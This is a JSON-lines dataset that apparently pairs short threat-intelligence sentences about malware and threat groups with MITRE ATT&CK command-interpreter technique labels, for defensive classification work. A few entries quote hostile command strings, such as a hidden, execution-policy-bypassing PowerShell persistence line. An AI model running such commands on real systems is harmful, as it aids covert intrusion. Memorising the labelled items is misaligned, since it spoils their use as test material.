{"text1":"Denis has a version written in PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"DownPaper uses PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"Dragonfly 2.0 used PowerShell scripts for execution.","labels":"['T1059.001']"}
|
|
{"text1":"Dragonfly has used PowerShell scripts for execution.","labels":"['T1059.001']"}
|
|
{"text1":"During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.","labels":"['T1059.001']"}
|
|
{"text1":"During Operation Wocao, threat actors used PowerShell on compromised systems.","labels":"['T1059.001']"}
|
|
{"text1":"Earth Lusca has used PowerShell to execute commands.","labels":"['T1059.001']"}
|
|
{"text1":"Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement.","labels":"['T1059.001']"}
|
|
{"text1":"Ember Bear has used PowerShell to download and execute malicious code.","labels":"['T1059.001']"}
|
|
{"text1":"Emotet has used Powershell to retrieve the malicious payload and download additional resources like Mimikatz.","labels":"['T1059.001']"}
|
|
{"text1":"Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the \"Invoke-PSRemoting\" module.","labels":"['T1059.001']"}
|
|
{"text1":"FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.","labels":"['T1059.001']"}
|
|
{"text1":"FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.","labels":"['T1059.001']"}
|
|
{"text1":"FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.","labels":"['T1059.001']"}
|
|
{"text1":"FIN8's malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access.","labels":"['T1059.001']"}
|
|
{"text1":"Ferocious can use PowerShell scripts for execution.","labels":"['T1059.001']"}
|
|
{"text1":"Fox Kitten has used PowerShell scripts to access credential data.","labels":"['T1059.001']"}
|
|
{"text1":"Frankenstein has used PowerShell to run a series of base64-encoded commands, that acted as a stager and enumerated hosts.","labels":"['T1059.001']"}
|
|
{"text1":"GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.","labels":"['T1059.001']"}
|
|
{"text1":"GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.","labels":"['T1059.001']"}
|
|
{"text1":"Gamaredon Group has used obfuscated PowerShell scripts for staging.","labels":"['T1059.001']"}
|
|
{"text1":"HAFNIUM has used the Exchange Power Shell module \"Set-OabVirtualDirectoryPowerShell\" to export mailbox data.","labels":"['T1059.001']"}
|
|
{"text1":"HAMMERTOSS is known to use PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.","labels":"['T1059.001']"}
|
|
{"text1":"Inception has used PowerShell to execute malicious commands and payloads.","labels":"['T1059.001']"}
|
|
{"text1":"Indrik Spider has used PowerShell Empire for execution of malware.","labels":"['T1059.001']"}
|
|
{"text1":"JCry has used PowerShell to execute payloads.","labels":"['T1059.001']"}
|
|
{"text1":"JSS Loader has the ability to download and execute PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"KOCTOPUS has used PowerShell commands to download additional files.","labels":"['T1059.001']"}
|
|
{"text1":"KONNI used PowerShell to download and execute a specific 64-bit version of the malware.","labels":"['T1059.001']"}
|
|
{"text1":"KeyBoy uses PowerShell commands to download and execute payloads.","labels":"['T1059.001']"}
|
|
{"text1":"Kimsuky has executed a variety of PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"Koadic has used PowerShell to establish persistence.","labels":"['T1059.001']"}
|
|
{"text1":"LazyScripter has used PowerShell scripts to execute malicious code.","labels":"['T1059.001']"}
|
|
{"text1":"Leviathan has used PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"LitePower can use a PowerShell script to execute commands.","labels":"['T1059.001']"}
|
|
{"text1":"Lizar has used PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"Lokibot has used PowerShell commands embedded inside batch scripts.","labels":"['T1059.001']"}
|
|
{"text1":"Magic Hound has used PowerShell for execution and privilege escalation.","labels":"['T1059.001']"}
|
|
{"text1":"Meteor can use PowerShell commands to disable the network adapters on a victim machines.","labels":"['T1059.001']"}
|
|
{"text1":"Mosquito can launch PowerShell Scripts.","labels":"['T1059.001']"}
|
|
{"text1":"MuddyWater has used PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"Mustang Panda has used malicious PowerShell scripts to enable execution.","labels":"['T1059.001']"}
|
|
{"text1":"Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.","labels":"['T1059.001']"}
|
|
{"text1":"Nomadic Octopus has used PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.","labels":"['T1059.001']"}
|
|
{"text1":"One version of Helminth uses a PowerShell script.","labels":"['T1059.001']"}
|
|
{"text1":"POSHSPY uses PowerShell to execute various commands, one to execute its payload.","labels":"['T1059.001']"}
|
|
{"text1":"POWERSOURCE is a PowerShell backdoor.","labels":"['T1059.001']"}
|
|
{"text1":"POWERSTATS uses PowerShell for obfuscation and execution.","labels":"['T1059.001']"}
|
|
{"text1":"POWERTON is written in PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"POWRUNER is written in PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"PUNCHBUGGY has used PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"PowGoop has the ability to use PowerShell scripts to execute commands.","labels":"['T1059.001']"}
|
|
{"text1":"PowerLess is written in and executed via PowerShell without using powershell.exe.","labels":"['T1059.001']"}
|
|
{"text1":"PowerShower is a backdoor written in PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"PowerSploit modules are written in and executed via PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"PyDCrypt has attempted to execute with PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"Pysa has used Powershell scripts to deploy its ransomware.","labels":"['T1059.001']"}
|
|
{"text1":"QakBot can use PowerShell to download and execute payloads.","labels":"['T1059.001']"}
|
|
{"text1":"REvil has used PowerShell to delete volume shadow copies and download files.","labels":"['T1059.001']"}
|
|
{"text1":"RogueRobin uses a command prompt to run a PowerShell script from Excel. To assist in establishing persistence, RogueRobin creates \"%APPDATA%\\OneDrive.bat\" and saves the following string to it:\"powershell.exe -WindowStyle Hidden -exec bypass -File \u201c%APPDATA%\\OneDrive.ps1\u201d\".","labels":"['T1059.001']"}
|
|
{"text1":"SHARPSTATS has the ability to employ a custom PowerShell script.","labels":"['T1059.001']"}
|
|
{"text1":"SMOKEDHAM can execute Powershell commands sent from its C2 server.","labels":"['T1059.001']"}
|
|
{"text1":"SQLRat has used PowerShell to create a Meterpreter session.","labels":"['T1059.001']"}
|
|
{"text1":"SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.","labels":"['T1059.001']"}
|
|
{"text1":"ServHelper has the ability to execute a PowerShell script to get information from the infected host.","labels":"['T1059.001']"}
|
|
{"text1":"SharpStage can execute arbitrary commands with PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"Sidewinder has used PowerShell to drop and execute malware loaders.","labels":"['T1059.001']"}
|
|
{"text1":"Socksbot can write and execute PowerShell scripts.","labels":"['T1059.001']"}
|
|
{"text1":"Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.","labels":"['T1059.001']"}
|
|
{"text1":"StrongPity can use PowerShell to add files to the Windows Defender exclusions list.","labels":"['T1059.001']"}
|
|
{"text1":"TA459 has used PowerShell for execution of a payload.","labels":"['T1059.001']"}
|
|
{"text1":"TEMP.Veles has used a publicly-available PowerShell-based tool, WMImplant. The group has also used PowerShell to perform Timestomping.","labels":"['T1059.001']"}
|
|
{"text1":"The Clambling dropper can use PowerShell to download the malware.","labels":"['T1059.001']"}
|
|
{"text1":"The NETWIRE binary has been executed via PowerShell script.","labels":"['T1059.001']"}
|
|
{"text1":"The Poseidon Group's Information Gathering Tool (IGT) includes PowerShell components.","labels":"['T1059.001']"}
|
|
{"text1":"There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.","labels":"['T1059.001']"}
|
|
{"text1":"Threat Group-3390 has used PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.","labels":"['T1059.001']"}
|
|
{"text1":"Tonto Team has used PowerShell to download additional payloads.","labels":"['T1059.001']"}
|
|
{"text1":"TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers.","labels":"['T1059.001']"}
|
|
{"text1":"UNC2452 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands.","labels":"['T1059.001']"}
|
|
{"text1":"WIRTE has used PowerShell for script execution.","labels":"['T1059.001']"}
|
|
{"text1":"WarzoneRAT can use PowerShell to download files and execute commands.","labels":"['T1059.001']"}
|
|
{"text1":"WellMess can execute PowerShell scripts received from C2.","labels":"['T1059.001']"}
|
|
{"text1":"WhisperGate can use PowerShell to support multiple actions including execution and defense evasion.","labels":"['T1059.001']"}
|
|
{"text1":"Wizard Spider has used macros to execute PowerShell scripts to download malware on victim's machines. It has also used PowerShell to execute commands and move laterally through a victim network.","labels":"['T1059.001']"}
|
|
{"text1":"Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.","labels":"['T1059.001']"}
|
|
{"text1":"Zeus Panda uses PowerShell to download and execute the payload.","labels":"['T1059.001']"}
|
|
{"text1":"Bundlore can use AppleScript to inject malicious JavaScript into a browser.","labels":"['T1059.002']"}
|
|
{"text1":"ThiefQuest uses AppleScript's \"osascript -e\" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.","labels":"['T1059.002']"}
|
|
{"text1":"macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file.","labels":"['T1059.002']"}
|
|
{"text1":"4H RAT has the capability to create a remote shell.","labels":"['T1059.003']"}
|
|
{"text1":"ABK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"ADVSTORESHELL can create a remote shell and run a given command.","labels":"['T1059.003']"}
|
|
{"text1":"APT18 uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"APT29 used \"cmd.exe\" to execute commands on remote machines.","labels":"['T1059.003']"}
|
|
{"text1":"APT32 has used cmd.exe for execution.","labels":"['T1059.003']"}
|
|
{"text1":"APT37 has used the command-line interface.","labels":"['T1059.003']"}
|
|
{"text1":"APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"APT41 used \"cmd.exe \/c\" to execute commands on remote machines.\nAPT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.","labels":"['T1059.003']"}
|
|
{"text1":"Action RAT can use `cmd.exe` to execute commands on an infected host.","labels":"['T1059.003']"}
|
|
{"text1":"An APT28 loader Trojan uses a cmd.exe and batch script to run its payload. The group has also used macros to execute payloads.","labels":"['T1059.003']"}
|
|
{"text1":"Anchor has used cmd.exe to run its self deletion routine.","labels":"['T1059.003']"}
|
|
{"text1":"Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to \"cmd \/C\".","labels":"['T1059.003']"}
|
|
{"text1":"AuTo Stealer can use `cmd.exe` to execute a created batch file.","labels":"['T1059.003']"}
|
|
{"text1":"BADNEWS is capable of executing commands via cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"BISCUIT has a command to launch a command shell on the system.","labels":"['T1059.003']"}
|
|
{"text1":"BLACKCOFFEE has the capability to create a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"BLINDINGCAN has executed commands via cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"BONDUPDATER can read batch commands in a file sent from its C2 server and execute them with cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"BRONZE BUTLER has used batch scripts and the command-line interface for execution.","labels":"['T1059.003']"}
|
|
{"text1":"Babuk has the ability to use the command line to control execution on compromised hosts.","labels":"['T1059.003']"}
|
|
{"text1":"BabyShark has used cmd.exe to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"BackConfig can download and run batch files to execute commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"Bandook is capable of spawning a Windows command shell.","labels":"['T1059.003']"}
|
|
{"text1":"Bankshot uses the command-line interface to execute arbitrary commands.","labels":"['T1059.003']"}
|
|
{"text1":"Bazar can launch cmd.exe to perform reconnaissance commands.","labels":"['T1059.003']"}
|
|
{"text1":"BlackMould can run cmd.exe with parameters.","labels":"['T1059.003']"}
|
|
{"text1":"BoxCaon can execute arbitrary commands and utilize the \"ComSpec\" environment variable.","labels":"['T1059.003']"}
|
|
{"text1":"Bumblebee can use `cmd.exe` to drop and run files.","labels":"['T1059.003']"}
|
|
{"text1":"CALENDAR has a command to run cmd.exe to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"CARROTBAT has the ability to execute command line arguments on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"Carbanak has a command to create a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"Cardinal RAT can execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"China Chopper's server component is capable of opening a command terminal.","labels":"['T1059.003']"}
|
|
{"text1":"Clambling can use cmd.exe for command execution.","labels":"['T1059.003']"}
|
|
{"text1":"Clop can use cmd.exe to help execute commands on the system.","labels":"['T1059.003']"}
|
|
{"text1":"Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands. The group has used an exploit toolkit known as Threadkit that launches .bat files.","labels":"['T1059.003']"}
|
|
{"text1":"Cobalt Strike uses a command-line interface to interact with systems.","labels":"['T1059.003']"}
|
|
{"text1":"ComRAT has used \"cmd.exe\" to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"Conti can utilize command line options to allow an attacker control over how it scans and encrypts files.","labels":"['T1059.003']"}
|
|
{"text1":"Cuba has used \"cmd.exe \/c\" and batch files for execution.","labels":"['T1059.003']"}
|
|
{"text1":"DanBot has the ability to execute arbitrary commands via `cmd.exe`.","labels":"['T1059.003']"}
|
|
{"text1":"Dark Caracal has used macros in Word documents that would download a second stage if executed.","labels":"['T1059.003']"}
|
|
{"text1":"DarkWatchman can use `cmd.exe` to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.","labels":"['T1059.003', 'T1547.009']"}
|
|
{"text1":"DealersChoice makes modifications to open-source scripts from GitHub and executes them on the victim\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"Dipsind can spawn remote shells.","labels":"['T1059.003']"}
|
|
{"text1":"DnsSystem can use `cmd.exe` for execution.","labels":"['T1059.003']"}
|
|
{"text1":"DownPaper uses the command line.","labels":"['T1059.003']"}
|
|
{"text1":"Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts.","labels":"['T1059.003']"}
|
|
{"text1":"Dragonfly has used various types of scripting to perform operations, including batch scripts.","labels":"['T1059.003']"}
|
|
{"text1":"Dtrack has used \"cmd.exe\" to add a persistent service.","labels":"['T1059.003']"}
|
|
{"text1":"During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.","labels":"['T1059.003']"}
|
|
{"text1":"During FunnyDream, the threat actors used `cmd.exe` to execute the wmiexec.vbs script.","labels":"['T1059.003']"}
|
|
{"text1":"During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells.","labels":"['T1059.003']"}
|
|
{"text1":"During Operation Honeybee, various implants used batch scripting and `cmd.exe` for execution.","labels":"['T1059.003']"}
|
|
{"text1":"During Operation Wocao, threat actors spawned a new `cmd.exe` process to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"Ember Bear had used `cmd.exe` and Windows Script Host (wscript) to execute malicious code.","labels":"['T1059.003']"}
|
|
{"text1":"Emissary has the capability to create a remote shell and execute specified commands.","labels":"['T1059.003']"}
|
|
{"text1":"Empire has modules for executing scripts.","labels":"['T1059.003']"}
|
|
{"text1":"EvilBunny has an integrated scripting engine to download and execute Lua scripts.","labels":"['T1059.003']"}
|
|
{"text1":"FIN10 has executed malicious .bat files containing PowerShell commands.","labels":"['T1059.003']"}
|
|
{"text1":"FIN6 has used \"kill.bat\" script to disable security tools.","labels":"['T1059.003']"}
|
|
{"text1":"FIN7 used the command prompt to launch commands on the victim\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"FIN8 has used a Batch file to automate frequently executed post compromise cleanup activities. FIN8 has also executed commands remotely via cmd.","labels":"['T1059.003']"}
|
|
{"text1":"Felismus uses command line for execution.","labels":"['T1059.003']"}
|
|
{"text1":"FlawedAmmyy has used `cmd` to execute commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer.","labels":"['T1059.003']"}
|
|
{"text1":"Fox Kitten has used cmd.exe likely as a password changing mechanism.","labels":"['T1059.003']"}
|
|
{"text1":"Frankenstein has run a command script to set up persistence as a scheduled task named \"WinUpdate\", as well as other encoded commands from the command-line.","labels":"['T1059.003']"}
|
|
{"text1":"FunnyDream can use `cmd.exe` for execution on remote hosts.","labels":"['T1059.003']"}
|
|
{"text1":"GALLIUM used the Windows command shell to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"Gamaredon Group has used various batch scripts to establish C2 and download additional files. Gamaredon Group's backdoor malware has also been written to a batch file.","labels":"['T1059.003']"}
|
|
{"text1":"Gold Dragon uses cmd.exe to execute commands for discovery.","labels":"['T1059.003']"}
|
|
{"text1":"GoldMax can spawn a command shell, and execute native commands.","labels":"['T1059.003']"}
|
|
{"text1":"GoldenSpy can execute remote commands via the command-line interface.","labels":"['T1059.003']"}
|
|
{"text1":"Goopy has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.","labels":"['T1059.003']"}
|
|
{"text1":"Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.","labels":"['T1059.003']"}
|
|
{"text1":"GravityRAT executes commands remotely on the infected host.","labels":"['T1059.003']"}
|
|
{"text1":"H1N1 kills and disables services by using cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.","labels":"['T1059.003']"}
|
|
{"text1":"HOMEFRY uses a command-line interface.","labels":"['T1059.003']"}
|
|
{"text1":"HTTPBrowser is capable of spawning a reverse shell on a victim.","labels":"['T1059.003']"}
|
|
{"text1":"Helminth can provide a remote shell. One version of Helminth uses batch scripting.","labels":"['T1059.003']"}
|
|
{"text1":"HermeticWizard can use `cmd.exe` for execution on compromised hosts.","labels":"['T1059.003']"}
|
|
{"text1":"Hi-Zor has the ability to create a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution.","labels":"['T1059.003']"}
|
|
{"text1":"Higaisa used \"cmd.exe\" for execution.","labels":"['T1059.003']"}
|
|
{"text1":"Hikit has the ability to create a remote shell and run given commands.","labels":"['T1059.003']"}
|
|
{"text1":"Indrik Spider has used batch scripts on victim's machines.","labels":"['T1059.003']"}
|
|
{"text1":"Ixeshe is capable of executing commands via cmd.","labels":"['T1059.003']"}
|
|
{"text1":"JHUHUGIT uses a .bat file to execute a .dll.","labels":"['T1059.003']"}
|
|
{"text1":"JPIN can use the command-line utility cacls.exe to change file permissions.","labels":"['T1059.003', 'T1222.001']"}
|
|
{"text1":"KEYMARBLE can execute shell commands using cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"KGH_SPY has the ability to set a Registry key to run a cmd.exe command.","labels":"['T1059.003']"}
|
|
{"text1":"KOCTOPUS has used `cmd.exe` and batch files for execution.","labels":"['T1059.003']"}
|
|
{"text1":"KOMPROGO is capable of creating a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"Kasidet can execute commands using cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"Ke3chang has used batch scripts in its malware to install persistence mechanisms.","labels":"['T1059.003']"}
|
|
{"text1":"Kimsuky has executed Windows commands by using `cmd` and running batch scripts.","labels":"['T1059.003']"}
|
|
{"text1":"LazyScripter has used batch files to deploy open-source and multi-stage RATs.","labels":"['T1059.003']"}
|
|
{"text1":"Leviathan uses a backdoor known as BADFLICK that is capable of generating a reverse shell, and has used multiple types of scripting for execution, including JavaScript and JavaScript Scriptlets in XML.","labels":"['T1059.003']"}
|
|
{"text1":"LightNeuron is capable of executing commands via cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"Linfo creates a backdoor through which remote attackers can start a remote shell.","labels":"['T1059.003']"}
|
|
{"text1":"Lizar has a command to open the command-line on the infected system.","labels":"['T1059.003']"}
|
|
{"text1":"Lokibot has used \"cmd \/c\" commands embedded within batch scripts.","labels":"['T1059.003']"}
|
|
{"text1":"LookBack executes the \"cmd.exe\" command.","labels":"['T1059.003']"}
|
|
{"text1":"LoudMiner used a batch script to run the Linux virtual machine as a service.","labels":"['T1059.003']"}
|
|
{"text1":"Lucifer can issue shell commands to download and execute additional payloads.","labels":"['T1059.003']"}
|
|
{"text1":"Machete has used batch files to initiate additional downloads of malicious files.","labels":"['T1059.003']"}
|
|
{"text1":"Magic Hound has used the command-line interface.","labels":"['T1059.003']"}
|
|
{"text1":"MechaFlounder has the ability to run commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"MegaCortex has used \".cmd\" scripts on the victim's system.","labels":"['T1059.003']"}
|
|
{"text1":"Meteor can run `set.bat`, `update.bat`, `cache.bat`, `bcd.bat`, `msrun.bat`, and similar scripts.","labels":"['T1059.003']"}
|
|
{"text1":"Micropsia creates a command-line shell using cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"Milan can use `cmd.exe` for discovery actions on a targeted system.","labels":"['T1059.003']"}
|
|
{"text1":"MirageFox has the capability to execute commands using cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"Mis-Type has used `cmd.exe` to run commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"Misdat is capable of providing shell functionality to the attacker to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"Mivast has the capability to open a remote shell and run basic commands.","labels":"['T1059.003']"}
|
|
{"text1":"MoonWind can execute commands via an interactive command shell. MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.","labels":"['T1059.003']"}
|
|
{"text1":"More_eggs has used cmd.exe for execution.","labels":"['T1059.003']"}
|
|
{"text1":"Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.","labels":"['T1059.003']"}
|
|
{"text1":"Mustang Panda has executed HTA files via cmd.exe, and used batch scripts for collection.","labels":"['T1059.003']"}
|
|
{"text1":"NETWIRE can issue commands using cmd.exe.","labels":"['T1059.003']"}
|
|
{"text1":"NanoCore can open a remote command-line interface and execute commands. NanoCore uses JavaScript files.","labels":"['T1059.003']"}
|
|
{"text1":"Nebulae can use CMD to execute a process.","labels":"['T1059.003']"}
|
|
{"text1":"Nomadic Octopus used \"cmd.exe \/c\" within a malicious macro.","labels":"['T1059.003']"}
|
|
{"text1":"OceanSalt can create a reverse shell on the infected endpoint using cmd.exe. OceanSalt has been executed via malicious macros.","labels":"['T1059.003']"}
|
|
{"text1":"OilRig has used macros to deliver malware such as QUADAGENT and OopsIE. OilRig has used batch scripts.","labels":"['T1059.003']"}
|
|
{"text1":"Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.","labels":"['T1059.003']"}
|
|
{"text1":"OopsIE uses the command prompt to execute commands on the victim's machine.","labels":"['T1059.003']"}
|
|
{"text1":"Operation Wocao has spawned a new \"cmd.exe\" process to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.","labels":"['T1059.003']"}
|
|
{"text1":"Orz can execute shell commands. Orz can execute commands with JavaScript.","labels":"['T1059.003']"}
|
|
{"text1":"Out1 can use native command line for execution.","labels":"['T1059.003']"}
|
|
{"text1":"OutSteel has used `cmd.exe` to scan a compromised host for specific file extensions.","labels":"['T1059.003']"}
|
|
{"text1":"PHOREAL is capable of creating a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"PLEAD has the ability to execute shell commands on the compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"POWRUNER can execute commands from its C2 server.","labels":"['T1059.003']"}
|
|
{"text1":"Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines.","labels":"['T1059.003']"}
|
|
{"text1":"PcShare can execute `cmd` commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"Peppy has the ability to execute shell commands.","labels":"['T1059.003']"}
|
|
{"text1":"PlugX allows actors to spawn a reverse shell on a victim.","labels":"['T1059.003']"}
|
|
{"text1":"Proxysvc executes a binary on the system and logs the results into a temp file by using: \"cmd.exe \/c \"<file_path> > %temp%\\PM* .tmp 2>&1\"\".","labels":"['T1059.003']"}
|
|
{"text1":"Pteranodon can use `cmd.exe` for execution on victim systems.","labels":"['T1059.003']"}
|
|
{"text1":"PyDCrypt has used `cmd.exe` for execution.","labels":"['T1059.003']"}
|
|
{"text1":"QUADAGENT uses cmd.exe to execute scripts and commands on the victim\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"QakBot can use cmd.exe to launch itself and to execute multiple C2 commands.","labels":"['T1059.003']"}
|
|
{"text1":"RATANKBA uses cmd.exe to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"RDAT has executed commands using \"cmd.exe \/c\".","labels":"['T1059.003']"}
|
|
{"text1":"REvil can use the Windows command line to delete volume shadow copies and disable recovery.","labels":"['T1059.003']"}
|
|
{"text1":"RGDoor uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059.003']"}
|
|
{"text1":"RTM uses the command line and rundll32.exe to execute.","labels":"['T1059.003']"}
|
|
{"text1":"Ragnar Locker has used cmd.exe and batch scripts to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"RainyDay can use the Windows Command Shell for execution.","labels":"['T1059.003']"}
|
|
{"text1":"Rancor has used cmd.exe to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"RedLeaves can receive and execute commands with cmd.exe. It can also provide a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.","labels":"['T1059.003']"}
|
|
{"text1":"RobbinHood uses cmd.exe on the victim's computer.","labels":"['T1059.003']"}
|
|
{"text1":"RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.","labels":"['T1059.003']"}
|
|
{"text1":"Ryuk has used \"cmd.exe\" to create a Registry entry to establish persistence.","labels":"['T1059.003']"}
|
|
{"text1":"S-Type has provided the ability to execute shell commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"SDBbot has the ability to use the command shell to execute commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"SEASHARPEE can execute commands on victims.","labels":"['T1059.003']"}
|
|
{"text1":"SNUGRIDE is capable of executing commands and spawning a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"STARWHALE has the ability to execute commands via `cmd.exe`.","labels":"['T1059.003']"}
|
|
{"text1":"SYSCON has the ability to execute commands through cmd on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"Saint Bot has used `cmd.exe` and `.bat` scripts for execution.","labels":"['T1059.003']"}
|
|
{"text1":"Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. Sakula also has the capability to invoke a reverse shell.","labels":"['T1059.003']"}
|
|
{"text1":"SamSam uses custom batch scripts to execute some of its components.","labels":"['T1059.003']"}
|
|
{"text1":"Sandworm Team has run the \"xp_cmdshell\" command in MS-SQL.","labels":"['T1059.003']"}
|
|
{"text1":"SeaDuke is capable of executing commands.","labels":"['T1059.003']"}
|
|
{"text1":"Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.","labels":"['T1059.003']"}
|
|
{"text1":"Seth-Locker can execute commands via the command line shell.","labels":"['T1059.003']"}
|
|
{"text1":"Several tools used by Suckfly have been command-line driven.","labels":"['T1059.003']"}
|
|
{"text1":"Shark has the ability to use `CMD` to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"SharpStage can execute arbitrary commands with the command line.","labels":"['T1059.003']"}
|
|
{"text1":"ShimRat can be issued a command shell function from the C2.","labels":"['T1059.003']"}
|
|
{"text1":"SideTwist can execute shell commands on a compromised host.","labels":"['T1059.003']"}
|
|
{"text1":"Small Sieve can use `cmd.exe` to execute commands on a victim's system.","labels":"['T1059.003']"}
|
|
{"text1":"StreamEx has the ability to remotely execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"TA505 has executed commands using \"cmd.exe\".","labels":"['T1059.003']"}
|
|
{"text1":"TA551 has used \"cmd.exe\" to execute commands.","labels":"['T1059.003']"}
|
|
{"text1":"TAINTEDSCRIBE can enable Windows CLI access and execute files.","labels":"['T1059.003']"}
|
|
{"text1":"TDTESS provides a reverse shell on the victim.","labels":"['T1059.003']"}
|
|
{"text1":"TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.","labels":"['T1059.003']"}
|
|
{"text1":"TYPEFRAME can uninstall malware components using a batch script. TYPEFRAME can execute commands using a shell.","labels":"['T1059.003']"}
|
|
{"text1":"Taidoor can copy cmd.exe into the system temp folder.","labels":"['T1059.003']"}
|
|
{"text1":"Tarrask may abuse the Windows schtasks command-line tool to create \"hidden\" scheduled tasks.","labels":"['T1059.003']"}
|
|
